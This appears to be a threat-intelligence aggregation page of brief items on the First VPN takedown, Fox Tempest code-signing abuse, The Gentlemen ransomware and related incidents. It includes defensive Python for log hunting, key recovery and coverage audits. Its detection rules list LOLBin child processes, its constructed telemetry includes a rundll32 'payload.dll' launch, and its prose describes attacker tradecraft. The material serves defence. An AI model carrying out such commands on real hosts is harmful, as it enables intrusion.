ctipilot.ch

Operation Saffron: First VPN criminal anonymisation service dismantled; Switzerland JIT participant; Phobos RaaS link confirmed

incident · item:operation-saffron-first-vpn-takedown-33-servers-27-countri

Coverage timeline: 1 brief; first 2026-05-22 → last 2026-05-22
Briefs: 1 (1 distinct)
Sources cited: 204 across 97 hosts
Sections touched: 1 (active_threats)
Co-occurring entities: 8

Story timeline

  1. 2026-05-22 · CTI Daily Brief — 2026-05-22 · active_threats: Eurojust-coordinated takedown 2026-05-19/20; 33 servers, 5,000+ accounts captured

Where this entity is cited

  • active_threats: 1

Source distribution

  • attack.mitre.org: 22 (11%)
  • thehackernews.com: 10 (5%)
  • bleepingcomputer.com: 9 (4%)
  • helpnetsecurity.com: 8 (4%)
  • securityweek.com: 8 (4%)
  • nvd.nist.gov: 7 (3%)
  • theregister.com: 6 (3%)
  • therecord.media: 5 (2%)
  • other: 129 (63%)

Items in briefs about Operation Saffron: First VPN criminal anonymisation service dismantled; Switzerland JIT participant; Phobos RaaS link confirmed (12)

Operation Saffron dismantles First VPN — 33+ servers seized, user database captured, Switzerland named JIT participant; Phobos RaaS infrastructure link confirmed

From CTI Daily Brief — 2026-05-22 · published 2026-05-22

A coordinated international law enforcement action on 2026-05-19 and 2026-05-20 took down First VPN, a Russian-language criminal anonymisation service established in 2014 and marketed on cybercrime forums as a no-log, law-enforcement-resistant tool (Eurojust, 2026-05-21). Europol stated the service "appeared in almost every major cybercrime investigation the agency supported" (BleepingComputer, 2026-05-21). Led by French and Dutch investigators through a Eurojust joint investigation team (JIT) established in November 2023, the operation seized more than 33 servers across 27 countries (counted by server hosting location); 16 nations participated through Europol's Joint Cybercrime Action Taskforce, and seven sat on the JIT: Switzerland, France, the Netherlands, Luxembourg, Romania, Ukraine and the UK, which points to operational involvement by fedpol and GovCERT.ch. Law enforcement arrested the administrator in Ukraine, captured the full user database (over 5,000 accounts) and connection records, and distributed 83 intelligence packages covering 506 users to partner agencies; Help Net Security reports that the captured data links to the Phobos ransomware-as-a-service operation and to broader ransomware, fraud and data-theft investigations (Help Net Security, 2026-05-21). The primary domains (1vpns.com, 1vpns.net, 1vpns.org) and associated .onion mirrors were seized. Historical network flows to those domains in proxy or firewall logs are now potential investigative leads for Europol sharing channels; Phobos affiliates have repeatedly targeted EU public-sector and healthcare organisations.
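
Retro-hunting those domains in proxy logs is the one action a defender can take on this item. The following is an added example (not from the brief, Europol or Eurojust) that matches a Squid-style access log against the three seized domains by DNS label suffix, so subdomains hit but look-alike names such as my1vpns.com do not. The log lines are constructed and the column layout assumes Squid's native format; adjust the field positions for other proxies.

```python
"""Retro-hunt proxy logs for the seized First VPN domains.

Added example, not part of the brief or of any law-enforcement tooling. The three
domains are from the text; the Squid-style access.log lines are constructed.
Matching is by DNS label suffix rather than substring, so 1vpns.com and
api.1vpns.com hit while my1vpns.com and 1vpns.com.evil.example do not.
"""
import re
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import urlsplit

SEIZED_DOMAINS = {"1vpns.com", "1vpns.net", "1vpns.org"}


def host_from_target(target: str) -> str:
    """Hostname from a proxy URL field: full URL, CONNECT host:port, or bare host."""
    if "://" in target:
        host = urlsplit(target).hostname or ""
    elif re.fullmatch(r"[^:]+:\d+", target):
        host = target.rsplit(":", 1)[0]
    else:
        host = target
    return host.lower().rstrip(".")


def matching_ioc(host: str, iocs=SEIZED_DOMAINS) -> Optional[str]:
    """Return the IOC domain that host equals or is a subdomain of, else None."""
    labels = host.split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in iocs:
            return candidate
    return None


def hunt_access_log(lines, iocs=SEIZED_DOMAINS):
    """Squid native format: time elapsed client action/code bytes method URL user hier type."""
    hits = []
    for line in lines:
        f = line.split()
        if len(f) < 8:
            continue  # truncated or foreign line: skip rather than guess
        host = host_from_target(f[6])
        ioc = matching_ioc(host, iocs)
        if ioc:
            ts = datetime.fromtimestamp(float(f[0]), tz=timezone.utc).isoformat()
            hits.append({"time": ts, "client": f[2], "user": f[7],
                         "method": f[5], "host": host, "ioc": ioc})
    return hits


# Constructed sample lines (RFC 5737 test addresses; not real observations).
SAMPLE_LOG = [
    "1778000000.123    245 10.20.4.17 TCP_TUNNEL/200 5120 CONNECT 1vpns.com:443 jdoe HIER_DIRECT/203.0.113.10 -",
    "1778000400.551     89 10.20.4.22 TCP_MISS/200 2048 GET http://api.1vpns.net/login jdoe HIER_DIRECT/203.0.113.11 text/html",
    "1778000800.009     12 10.20.4.30 TCP_MISS/200 1024 GET http://my1vpns.com/ ssmith HIER_DIRECT/198.51.100.5 text/html",
    "1778001200.777    300 10.20.4.17 TCP_TUNNEL/200 9000 CONNECT 1vpns.com.evil.example:443 jdoe HIER_DIRECT/198.51.100.9 -",
]

if __name__ == "__main__":
    for hit in hunt_access_log(SAMPLE_LOG):
        print(hit)
```

Each hit carries client, authenticated user and time, which is what an intelligence package request from a partner agency will ask for; a plain substring grep on "1vpns" would have returned the third and fourth lines as well.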

UPDATE: West Pharmaceutical Services — 8-K/A confirms full operational restoration, data investigation ongoing

From CTI Daily Brief — 2026-05-22 · published 2026-05-22

UPDATE (originally covered 2026-W21): West Pharmaceutical Services (NYSE: WST) filed an 8-K/A amendment under SEC Item 1.05 on 2026-05-20 confirming full operational restoration across all manufacturing, supply chain, and commercial sites globally after the May 4 ransomware intrusion (SEC EDGAR 8-K/A, 2026-05-20). No unauthorized activity observed since 2026-05-05. Data exfiltration scope and threat actor attribution remain under investigation; Palo Alto Networks Unit 42 is conducting the forensic response. The 8-K/A marks formal closure of the containment phase under the SEC's mandatory cyber-incident disclosure cycle; data impact scope will require a further disclosure when the investigation concludes.

CVE-2026-42822 — Microsoft Azure Local Disconnected Operations (ALDO): CVSS 10.0 unauthenticated network elevation-of-privilege, "Exploitation More Likely"

From CTI Daily Brief — 2026-05-21 · published 2026-05-21

Microsoft assigned CVE-2026-42822 (CVSS 3.1 = 10.0, CWE-287 Improper Authentication, vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) to an authentication-bypass flaw in Azure Local Disconnected Operations (ALDO), Microsoft's solution for running Azure services in air-gapped or partially disconnected environments; an unauthenticated network attacker with no credentials and no prior foothold can obtain elevated privileges (Microsoft MSRC, 2026-05-18). MSRC rates it "Exploitation More Likely"; no in-the-wild exploitation and no public PoC at advisory release. Cloud-managed Azure customers using Microsoft-operated Resource Manager environments are already protected; only manually operated air-gapped Azure Local stacks need action. Remediation is an upgrade of ALDO to version 2604 or later via the standard ALDO update channel. Defender takeaway: EU public-sector operators running Azure Local for data-sovereignty or federal data-residency compliance (a common pattern in Bundesverwaltung and German Bundesbehörden environments) should treat this as an emergency patch, because disconnected infrastructure typically updates more slowly than cloud-managed Azure. Restrict the ALDO management plane to admin-only out-of-band subnets until v2604 is installed.

Microsoft DCU disrupts Fox Tempest malware-signing-as-a-service feeding Rhysida, INC, Qilin and Akira ransomware operations

From CTI Daily Brief — 2026-05-20 · published 2026-05-20

Microsoft Threat Intelligence published a detailed exposure of "Fox Tempest" on 2026-05-19, concurrent with the Microsoft Digital Crimes Unit unsealing a civil action in the U.S. District Court for the Southern District of New York and seizing the signspace[.]cloud infrastructure (The Record, 2026-05-19). The actor has operated a malware-signing-as-a-service (MSaaS) since at least May 2025, abusing Microsoft Artifact Signing (formerly Azure Trusted Signing) to mint short-lived (72-hour) code-signing certificates tied to stolen US and Canadian identities (Microsoft Threat Intelligence). Customers uploaded malicious binaries masquerading as AnyDesk, Teams, PuTTY and Webex and received Microsoft-signed executables that cleared AV/EDR trust checks which favour Microsoft-signed code. Microsoft's write-up details the commercialisation: signing certificates sold to ransomware affiliates per signing run, with delivery moving in February 2026 to VMs on Cloudzy-hosted infrastructure that accepted customer binaries and returned signed outputs.

Confirmed downstream customers: Vanilla Tempest (deploying Rhysida ransomware via Microsoft-signed MSTeamsSetup.exe carrying the Oyster/Broomstick backdoor), Storm-0501, Storm-2561, Storm-0249, and ransomware families Rhysida, INC, Qilin, Akira, plus commodity loaders Oyster, Lumma Stealer, and Vidar. Microsoft revoked 1,000+ fraudulent code-signing certificates, disabled hundreds of Cloudzy-hosted VMs that Fox Tempest used as its delivery surface, and rolled identity-validation controls into Artifact Signing. Microsoft's blog notes confirmed affected sectors include healthcare, education, government, and financial services across the US, France, India, and China.

Why it matters to us: European public-sector and healthcare organisations are downstream victims of the affiliates Fox Tempest serviced (Rhysida, Qilin and Akira have all hit EU targets). Hunt for Microsoft-signed PE binaries whose signing certificate is valid for 72 hours or less, chains to a Trusted Signing issuing CA, was issued after 2025-05-01 and carries a subject CN that does not match a known organisational signer. Where Teams, AnyDesk, PuTTY or Webex installers spawn cmd.exe, powershell.exe, rundll32.exe or regsvr32.exe without the expected Microsoft installer ancestry (Sysmon Event ID 1 with a parent-image filter), treat the chain as an Oyster/Broomstick suspect. Restrict who can create Artifact Signing accounts and certificate profiles, require phishing-resistant MFA and a compliant device for Azure subscription management, and alert (for example in Defender for Cloud Apps) on rapid certificate-profile creation from newly enrolled tenants.
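
The two hunts above, as an added example run over constructed telemetry (not Microsoft's detection content): the first flags Authenticode signer records whose certificate is valid for 72 hours or less, chains to a Trusted Signing issuing CA, was issued after the campaign start and carries a subject CN outside the organisation's known signers; the second flags Sysmon Event ID 1 records in which a lure-named installer spawns cmd.exe, powershell.exe, rundll32.exe or regsvr32.exe. The `k=v;k=v` export format, the issuer-name substring "Microsoft ID Verified" and every sample record are assumptions for illustration; check the issuer string against a real Trusted Signing certificate in local telemetry before deploying.

```python
"""Hunt rules for the Fox Tempest pattern: short-lived Trusted Signing certificates
on unknown signers, and lure installers spawning LOLBins.

Added example, not Microsoft's detection content. Field names, the issuer-name hint
and all sample records are assumptions constructed for illustration.
"""
from datetime import datetime, timedelta, timezone

TS_ISSUER_HINT = "Microsoft ID Verified"   # assumption: Trusted Signing issuing-CA naming
SHORT_LIVED = timedelta(hours=72)
CAMPAIGN_START = datetime(2025, 5, 1, tzinfo=timezone.utc)
LURE_PARENTS = {"msteamssetup.exe", "teams.exe", "anydesk.exe", "putty.exe", "webex.exe"}
SUSPECT_CHILDREN = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"}


def parse_kv(line: str) -> dict:
    """Parse 'k=v;k=v' export lines; split on the first '=' so 'CN=...' values survive."""
    out = {}
    for field in line.split(";"):
        k, _, v = field.partition("=")
        out[k.strip()] = v.strip()
    return out


def _ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _cn(subject: str) -> str:
    """Take the CN attribute out of an RDN string such as 'CN=Foo, O=Bar'."""
    for part in subject.split(","):
        k, _, v = part.strip().partition("=")
        if k.upper() == "CN":
            return v
    return subject


def flag_short_lived_signatures(lines, known_signers):
    """Paths whose signer cert is <=72h valid, from a Trusted Signing CA, issued after
    the campaign start, with a subject CN we do not recognise."""
    hits = []
    for rec in map(parse_kv, lines):
        if TS_ISSUER_HINT not in rec["issuer"]:
            continue
        nb, na = _ts(rec["not_before"]), _ts(rec["not_after"])
        if na - nb > SHORT_LIVED or nb < CAMPAIGN_START:
            continue
        if _cn(rec["subject"]) in known_signers:
            continue
        hits.append(rec["path"])
    return hits


def flag_lure_installer_children(lines):
    """Sysmon EID 1: a lure-named parent spawning cmd/powershell/rundll32/regsvr32."""
    hits = []
    for ev in map(parse_kv, lines):
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        child = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent in LURE_PARENTS and child in SUSPECT_CHILDREN:
            hits.append((ev["parent_image"], ev["image"], ev.get("command_line", "")))
    return hits


# Constructed sample telemetry (not real observations).
SIG_SAMPLE = [
    r"path=C:\Users\kb\Downloads\MSTeamsSetup.exe;subject=CN=Northwind Logistics LLC, O=Northwind Logistics LLC;issuer=CN=Microsoft ID Verified CS AOC CA 01;not_before=2026-03-02T09:14:00Z;not_after=2026-03-05T09:14:00Z",
    r"path=C:\Program Files\Microsoft\Teams\current\Teams.exe;subject=CN=Microsoft Corporation, O=Microsoft Corporation;issuer=CN=Microsoft Code Signing PCA 2011;not_before=2025-09-11T20:11:00Z;not_after=2026-09-04T20:11:00Z",
    r"path=C:\Tools\inventory.exe;subject=CN=Contoso Pharma AG, O=Contoso Pharma AG;issuer=CN=Microsoft ID Verified CS AOC CA 01;not_before=2026-02-10T08:00:00Z;not_after=2026-02-13T08:00:00Z",
    r"path=C:\Users\kb\Downloads\putty.exe;subject=CN=Fabrikam Trading Ltd;issuer=CN=Microsoft ID Verified CS AOC CA 01;not_before=2025-03-20T10:00:00Z;not_after=2025-03-23T10:00:00Z",
]
EID1_SAMPLE = [
    r"parent_image=C:\Users\kb\Downloads\MSTeamsSetup.exe;image=C:\Windows\System32\rundll32.exe;command_line=rundll32.exe C:\Users\kb\AppData\Local\Temp\payload.dll,Run",
    r"parent_image=C:\Program Files\Microsoft\Teams\current\Teams.exe;image=C:\Windows\System32\conhost.exe;command_line=conhost.exe 0xffffffff",
    r"parent_image=C:\Windows\explorer.exe;image=C:\Windows\System32\cmd.exe;command_line=cmd.exe /c whoami",
]

if __name__ == "__main__":
    print(flag_short_lived_signatures(SIG_SAMPLE, {"Contoso Pharma AG"}))
    print(flag_lure_installer_children(EID1_SAMPLE))
```

The first rule is deliberately conjunctive: a 72-hour certificate alone is how Trusted Signing always works, and legitimate in-house signers will produce them, so the allowlist of known subject CNs carries the rule. The second rule is a parent/child pairing only; extend it with the expected installer ancestry (msiexec.exe or the vendor's own setup chain) once that is profiled from clean installs.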

INTERPOL Operation Ramz — 13-country MENA cybercrime sweep: 201 arrests, 53 servers seized, Algerian PhaaS server takedown

From CTI Daily Brief — 2026-05-19 · published 2026-05-19

INTERPOL announced on 2026-05-18 the completion of Operation Ramz — described as the first cyber operation of its scale coordinated by INTERPOL specifically targeting the MENA region — running October 2025 through 2026-02-28 across 13 countries (Algeria, Bahrain, Egypt, Iraq, Jordan, Lebanon, Libya, Morocco, Oman, Palestine, Qatar, Tunisia, UAE) (INTERPOL, 2026-05-18; The Hacker News, 2026-05-18; Help Net Security, 2026-05-18). Outcomes: 201 arrests, 382 further suspects identified, 3,867 victims, 53 servers seized, ~8,000 intelligence data points disseminated. Algerian authorities dismantled a phishing-as-a-service operation, seizing a server, computer and hard drives containing phishing software and scripts. Moroccan police seized devices with banking data and phishing tooling; Omani investigators identified a residential server with active malware infection. Jordanian police rescued 15 human-trafficking victims who had been coerced into running cybercrime operations — the same forced-labour-to-cyber-scam pipeline documented in Southeast Asian fraud compounds. Industry partners: Group-IB, Kaspersky, Shadowserver Foundation, Team Cymru, TrendAI. The operation is partially funded by the EU and Council of Europe under the CyberSouth+ project.

Why it matters to us: MENA-based PhaaS kits routinely target EU banking customers and EU payment rails (SEPA Instant flagging, IBAN-based phishing lures); the disruption reduces commodity-kit availability, and the Shadowserver and Group-IB intelligence shared through the operation will surface in NCSC, BSI and NCSC-CH advisories over the coming weeks. The trafficking-to-scam pipeline confirmed in Jordan is the same operator model Europol has been mapping for fraud-compound disruption.

"The Gentlemen" RaaS — communications overhaul underway; operations continuing post-database-leak [SINGLE-SOURCE: Check Point]

From CTI Weekly Summary — 2026-W21 (Mon 18 – Sun 24, 2026) · published 2026-05-18

As of 2026-05-14, Check Point had published a full analysis of the leaked 16.22 GB "Rocket" database. Administrator zeta88 announced a communications-infrastructure overhaul (new Tor addresses, new affiliate channels) rather than a shutdown; the operator is hardening against exposure, not exiting. Bedrock Safeguard's decryptor works against the pre-patch binary, and the operator claims to have patched it. Continued victim activity is expected. No new victim disclosures or Tor-address confirmations surfaced in W21 research; watch for a new DLS address announcement.

Europol EU Anti-Scam Platform — weekly law-enforcement-only fraud intelligence; EC3 + EFECC operational hub [SINGLE-SOURCE: AML Intelligence]

From CTI Weekly Summary — 2026-W21 (Mon 18 – Sun 24, 2026) · published 2026-05-18

Europol launched the EU Anti-Scam Platform (~29 April 2026) at the European Anti-Financial Crime Summit. The platform produces weekly law-enforcement-only briefings (via SIENA) covering prevalent fraud types, financial losses, victim demographics, scammer TTPs, and transaction footprints. Swiss fedpol and KOBIK have Europol liaison access via bilateral agreements; financial intelligence outputs may feed into MROS/AMLA channels. Swiss financial sector entities under AMLA supervision should note this as an emerging source of new suspicious-transaction-report typologies. [SINGLE-SOURCE]

"The Gentlemen" RaaS — operations continue post-leak, decryptor published, FortiOS / Erlang SSH initial access CVEs confirmed

From CTI Weekly Summary — 2026-W20 (May 11 – May 17, 2026) · published 2026-05-17

Following the 2026-05-04 leak of the Rocket backend database (attributed to a breach of hosting provider 4VPS), administrator zeta88 / hastalamuerte announced a full communications-infrastructure overhaul, a new NAS deployment and new locker upgrades, signalling no intent to cease operations. The operation claimed roughly 332 victims in H1 2026, ranking second in global RaaS activity per Check Point Research. Check Point documented initial access via CVE-2024-55591 (FortiOS management-interface authentication bypass, exploited in the wild since November 2024) and CVE-2025-32433 (Erlang/OTP SSH server pre-authentication RCE, reached through Cisco products that embed it); the post-access chain includes RelayKing-based NTLM relay (CVE-2025-33073), AD enumeration, EDR disablement and a GPO-deployed locker (Check Point Research; Check Point blog; daily 2026-05-14 UPDATE).

Bedrock Safeguard (a Canadian security firm) published a working decryptor on 2026-05-14 that exploits the locker's failure to zero its XChaCha20 / X25519 ephemeral private-key material, which Go leaves behind on goroutine stacks after use; 35 of 35 test files decrypted. The operator claims to have patched the binary, so the decryptor is best-case retrospective; affiliates show no evidence of forking, and the core nine-person structure remains intact per the leaked chats (Bedrock Safeguard decryptor). Defender takeaway: on any Gentlemen-impacted host, capture a process-memory dump of the locker (or a full memory image) before reimaging so ephemeral keys can be recovered; verify FortiOS patch state for CVE-2024-55591 across every Swiss / EU public-sector Fortinet deployment (the FortiOS bug is the documented primary initial-access vector, and the W19 long-running record already lists this CVE).
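
The key-recovery idea behind a decryptor of this kind, as an added illustration (not Bedrock Safeguard's code): if the locker stores each file's ephemeral X25519 public key with the file and the matching private scalar survives on a goroutine stack, a memory dump can be scanned for 32-byte windows whose derived public key equals the header value; the recovered scalar then reproduces the shared secret with the operator's public key embedded in the binary. The X25519 implementation follows RFC 7748 and is checked against its test vector; the header layout, the operator-key location and the derivation from shared secret to XChaCha20 file key are unknown for this locker and are not modelled. The dump and keys below are constructed.

```python
"""Recover a leaked per-file X25519 ephemeral private key from a process-memory dump.

Added example, not Bedrock Safeguard's decryptor. It models the weakness the brief
describes: the locker generates an ephemeral X25519 key pair per file, the ephemeral
public key is assumed to travel with the file, and the private scalar survives on a
goroutine stack. Each 32-byte window of the dump is tested by deriving its public key
and comparing with the header value. Header layout and the shared-secret to XChaCha20
key derivation are unknown for this locker and are omitted.
"""
import hashlib

P = 2**255 - 19                       # Curve25519 field prime
A24 = 121665                          # (486662 - 2) / 4, RFC 7748 ladder constant
BASEPOINT = (9).to_bytes(32, "little")
KEY_LEN = 32


def _decode_scalar(k: bytes) -> int:
    """RFC 7748 clamping: clear the 3 low bits and the top bit, set bit 254."""
    b = bytearray(k)
    b[0] &= 248
    b[31] &= 127
    b[31] |= 64
    return int.from_bytes(b, "little")


def _decode_u(u: bytes) -> int:
    b = bytearray(u)
    b[31] &= 127                      # the unused top bit is ignored
    return int.from_bytes(b, "little") % P


def x25519(k: bytes, u: bytes) -> bytes:
    """RFC 7748 X25519: Montgomery ladder computing k * (point with u-coordinate u)."""
    k_int = _decode_scalar(k)
    x1 = _decode_u(u)
    x2, z2, x3, z3 = 1, 0, x1, 1
    swap = 0
    for t in range(254, -1, -1):
        kt = (k_int >> t) & 1
        swap ^= kt
        if swap:
            x2, x3, z2, z3 = x3, x2, z3, z2
        swap = kt
        a, b = (x2 + z2) % P, (x2 - z2) % P
        aa, bb = a * a % P, b * b % P
        e = (aa - bb) % P
        c, d = (x3 + z3) % P, (x3 - z3) % P
        da, cb = d * a % P, c * b % P
        x3 = (da + cb) * (da + cb) % P
        z3 = x1 * ((da - cb) * (da - cb)) % P
        x2 = aa * bb % P
        z2 = e * (aa + A24 * e) % P
    if swap:
        x2, x3, z2, z3 = x3, x2, z3, z2
    return (x2 * pow(z2, P - 2, P) % P).to_bytes(32, "little")


def scan_dump_for_private_key(dump: bytes, header_pub: bytes, stride: int = 8):
    """(offset, scalar) of the first window whose public key equals header_pub, else None.
    stride=8 matches amd64 Go stack-slot alignment; stride=1 is the exhaustive pass."""
    for off in range(0, len(dump) - KEY_LEN + 1, stride):
        cand = dump[off:off + KEY_LEN]
        if x25519(cand, BASEPOINT) == header_pub:
            return off, cand
    return None


def recover_shared_secret(dump: bytes, header_pub: bytes, operator_pub: bytes):
    """Recompute the per-file DH secret the locker derived, or None if no key is found."""
    hit = scan_dump_for_private_key(dump, header_pub)
    if hit is None:
        return None
    return x25519(hit[1], operator_pub)


def _det(label: str) -> bytes:
    """Deterministic stand-in for os.urandom so the demo is reproducible."""
    return hashlib.sha256(label.encode()).digest()


def build_demo():
    """Constructed scenario: operator long-term key, one per-file ephemeral key, and a
    fake goroutine-stack dump with the ephemeral scalar left at an aligned offset."""
    operator_priv = _det("operator-long-term-key")
    operator_pub = x25519(operator_priv, BASEPOINT)
    eph_priv = _det("per-file-ephemeral")
    header_pub = x25519(eph_priv, BASEPOINT)
    expected_secret = x25519(eph_priv, operator_pub)   # what the locker keyed the file from
    filler = hashlib.sha512(b"stack-noise").digest() * 6  # 384 bytes of stack junk
    dump = filler[:200] + eph_priv + filler[200:]         # scalar at offset 200 (8-aligned)
    return dump, header_pub, operator_pub, operator_priv, expected_secret


if __name__ == "__main__":
    dump, header_pub, operator_pub, operator_priv, expected = build_demo()
    hit = scan_dump_for_private_key(dump, header_pub)
    print("ephemeral scalar at offset", None if hit is None else hit[0])
    print("shared secret reproduced:", recover_shared_secret(dump, header_pub, operator_pub) == expected)
```

One scalar multiplication per candidate window is slow in pure Python, so a real dump wants a native X25519 and, for amd64 Go binaries, an 8-byte stride first (stack slots are 8-byte aligned) before an exhaustive byte-stride pass; the operator-side check in the test (the operator's long-term key against the header public key yields the same secret) is the DH symmetry that makes the recovered scalar sufficient.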

[SINGLE-SOURCE-OTHER] West Pharmaceutical Services files SEC Form 8-K Item 1.05 — data exfiltrated, systems encrypted, global operations partially restarted

From CTI Daily Brief — 2026-05-12 · published 2026-05-12

West Pharmaceutical Services Inc. (NYSE: WST), a US-headquartered global manufacturer of drug-delivery and packaging components, filed a Form 8-K on 2026-05-11 disclosing a material cybersecurity incident under Item 1.05 (SEC EDGAR — WST 8-K, 2026-05-11). The filing states that detection occurred on 2026-05-04, materiality was determined on 2026-05-07, and that "certain data was exfiltrated by an unauthorized party and certain systems were encrypted", terminology consistent with double-extortion ransomware: T1486 Data Encrypted for Impact preceded by exfiltration (the filing does not identify the exfiltration channel, so T1041 versus T1567 is undetermined). The company took global systems offline, activated incident response, notified law enforcement and engaged external forensics; core enterprise systems are restored, shipping, receiving and manufacturing are partially restarted at some facilities, and the full restoration timeline and material financial impact remain undetermined. No threat actor had claimed responsibility publicly at the time of filing.

Defender takeaway: a double-extortion event against an OT-adjacent pharmaceutical packaging manufacturer is a high-supply-chain-risk template: West's elastomeric closures, vials and drug-delivery devices feed European biopharma packaging lines, including those of national-formulary suppliers. EU public-sector procurement teams handling pharmaceutical resilience plans should validate continuity of supply with downstream vendors that source closures or delivery devices from West. Detection pivot for analogous targets: large-volume SMB enumeration, vssadmin or WMI shadow-copy deletion (T1490 Inhibit System Recovery), and abnormal egress volume in the days before encryption; the encryption event is rarely the first indicator if logs are retained.

Audit SIEM/XDR telemetry coverage as a percentage of host inventory; the South Staffordshire 5%-coverage finding is the operational lesson

From CTI Daily Brief — 2026-05-12 · published 2026-05-12

For any SOC serving a NIS2 / KRITIS-DachG / CER essential entity: measure SIEM / XDR coverage by hostname inventory, not by sensor-licence count. South Staffordshire's 5% coverage is what the ICO judged inadequate for a water operator of essential services; with NIS2 transposition in force across the EU and KRITIS-DachG live in Germany, regulators now have a concrete UK precedent for what a failure of "proportionate technical measures" looks like in court. Practical first step: export every Active Directory-joined computer object, cross-reference it against the EDR and SIEM source lists, and flag the delta. That delta is what the ICO would call the gap.
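
The cross-reference described above, as an added example (not the ICO's or any regulator's method) over constructed exports: AD computer objects as Get-ADComputer returns them (DNSHostName plus Enabled), the EDR console's NetBIOS device names and the SIEM's mixed-form log-source names. Hostnames are reduced to their short label before comparison so FQDN/NetBIOS mismatches are not mistaken for gaps; disabled computer accounts are excluded from the denominator but counted, and hosts a sensor sees that AD does not know about are reported separately.

```python
"""Measure SIEM/XDR coverage against the AD host inventory, not the sensor-licence count.

Added example; not the ICO's or any regulator's method. Inputs are constructed exports:
AD computer objects (FQDN plus Enabled flag), the EDR console's device names (NetBIOS,
upper case) and the SIEM's log-source list (mixed). Names are reduced to the short host
label before comparison so FQDN/NetBIOS mismatches do not masquerade as gaps.
"""
from dataclasses import dataclass


def short_name(host: str) -> str:
    """Normalise 'WS-0412', 'ws-0412.corp.example' and ' ws-0412 ' to 'ws-0412'."""
    return host.strip().lower().split(".")[0]


@dataclass
class CoverageReport:
    in_scope: int            # enabled AD computer objects (the denominator)
    covered_edr: int
    covered_siem: int
    covered_any: int
    missing_edr: list
    missing_siem: list
    missing_both: list       # no telemetry at all: the ICO-style gap
    unmanaged: list          # reporting to a sensor but absent from AD
    disabled_skipped: int

    def pct(self, covered: int) -> float:
        return round(100.0 * covered / self.in_scope, 1) if self.in_scope else 0.0


def coverage(ad_rows, edr_hosts, siem_hosts) -> CoverageReport:
    """ad_rows: iterable of (dns_hostname, enabled). Sensor lists: iterables of hostnames."""
    ad = {short_name(h) for h, enabled in ad_rows if enabled}
    disabled = sum(1 for _, enabled in ad_rows if not enabled)
    edr = {short_name(h) for h in edr_hosts}
    siem = {short_name(h) for h in siem_hosts}
    return CoverageReport(
        in_scope=len(ad),
        covered_edr=len(ad & edr),
        covered_siem=len(ad & siem),
        covered_any=len(ad & (edr | siem)),
        missing_edr=sorted(ad - edr),
        missing_siem=sorted(ad - siem),
        missing_both=sorted(ad - edr - siem),
        unmanaged=sorted((edr | siem) - ad),
        disabled_skipped=disabled,
    )


# Constructed inventory and sensor exports (not real hosts).
AD_EXPORT = [
    ("dc01.corp.example", True), ("fs01.corp.example", True),
    ("ws-0412.corp.example", True), ("ws-0413.corp.example", True),
    ("scada-hmi01.ot.example", True), ("hist01.ot.example", True),
    ("old-ws-0099.corp.example", False),
]
EDR_CONSOLE = ["DC01", "FS01", "WS-0412", "WS-0413", "LAPTOP-CONTRACTOR7"]
SIEM_SOURCES = ["dc01.corp.example", "fs01.corp.example", "scada-hmi01"]

if __name__ == "__main__":
    r = coverage(AD_EXPORT, EDR_CONSOLE, SIEM_SOURCES)
    print(f"EDR {r.pct(r.covered_edr)}%  SIEM {r.pct(r.covered_siem)}%  any {r.pct(r.covered_any)}%")
    print("no telemetry at all:", r.missing_both)
    print("sensor sees, AD does not:", r.unmanaged)
```

In the constructed data the EDR licence count (5 devices) would suggest near-complete coverage of a 6-host estate, yet one of those devices is not an AD member and two OT hosts have no EDR at all; the OT historian has no telemetry source whatsoever, which is the finding a regulator would seize on. Non-domain-joined OT and appliance hosts need a second inventory source (DHCP leases, switch MAC tables, asset register) added to the denominator before the percentage means anything.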

The Gentlemen RaaS — Europe-skewed operation surged approximately 448% QoQ; 32% of Q1 2026 victims in Europe; FortiGate CVE-2024-55591 initial-access funnel

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11

W1 horizon research identified an in-window operator gap the daily briefs missed. "The Gentlemen" emerged in August 2025 and, per ZeroFox, surged to the second- or third-most-active ransomware operation globally in Q1 2026: 192 attacks that quarter, an increase of approximately 448% QoQ, with 32% of Q1 2026 victims in Europe (up from 2% in Q4 2025) (ZeroFox Q1 2026 Wrap-Up, 2026-04-17). Check Point Research's DFIR report on the operator confirms the post-compromise tradecraft observed during a single incident-response engagement: Cobalt Strike delivered via RPC from a domain controller; Mimikatz for credential harvesting; GPO abuse to inject a scheduled task into Group Policy that propagates the encryptor to all domain-joined systems near-simultaneously, compressing time-to-encryption to minimise the IR window; SystemBC SOCKS5 C2 tunnelling and covert payload staging; encryption using a per-file X25519 Diffie–Hellman key exchange combined with the XChaCha20 stream cipher, with a fresh ephemeral key pair and random 32-byte private key per file (Check Point Research DFIR Report, 2026-04-20 · BleepingComputer — The Gentlemen + SystemBC, 2026-04-20). CPR states explicitly that the precise initial-access vector could not be conclusively determined for the engagement it analysed; broader reporting attributes initial access to a FortiOS / FortiProxy attack surface that includes CVE-2024-55591 (authentication bypass, CVSS 9.8, patched January 2025), with secondary reporting describing an operator database of pre-exploited devices and brute-forced VPN credentials primed for deployment. Defenders should therefore treat current patch state alone as insufficient: a device that was unpatched against CVE-2024-55591 at any point during the exposure window may already be in that database.

European victims surfaced in BleepingComputer's SystemBC coverage and in quarterly leak-site aggregation include Oltenia Energy Complex (Romania — described as a significant portion of national electricity supply, December 2025) and The Adaptavist Group; Comparitech's Q1 2026 healthcare roundup attributes 10 healthcare-sector claims to the operator in the quarter; the operator's leak-site footprint and the absence of an "off-limits" sector convention make hospitals, water utilities, and similar critical-infrastructure targets in-scope. The cross-finding with this week's other concerns: GPO-injected scheduled-task propagation defeats backup-isolation defences if the AD environment is in the encryption path; if the operator's initial-access funnel includes unpatched FortiGate devices, that surface intersects directly with the Polish water-OT NIS2 coverage-gap framing (§ 4, § 6) since small municipal CI operators are over-represented in the unpatched-FortiGate population. Defender priorities for 2026-W20: hunt scheduled tasks in SYSVOL pointing to UNC paths or temp directories; profile SystemBC SOCKS5 beacons; add XChaCha20 file-header pattern detection at backup / DLP tier; re-verify FortiGate patch state against CVE-2024-55591 and any later FortiOS / FortiProxy auth-bypass advisories.
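
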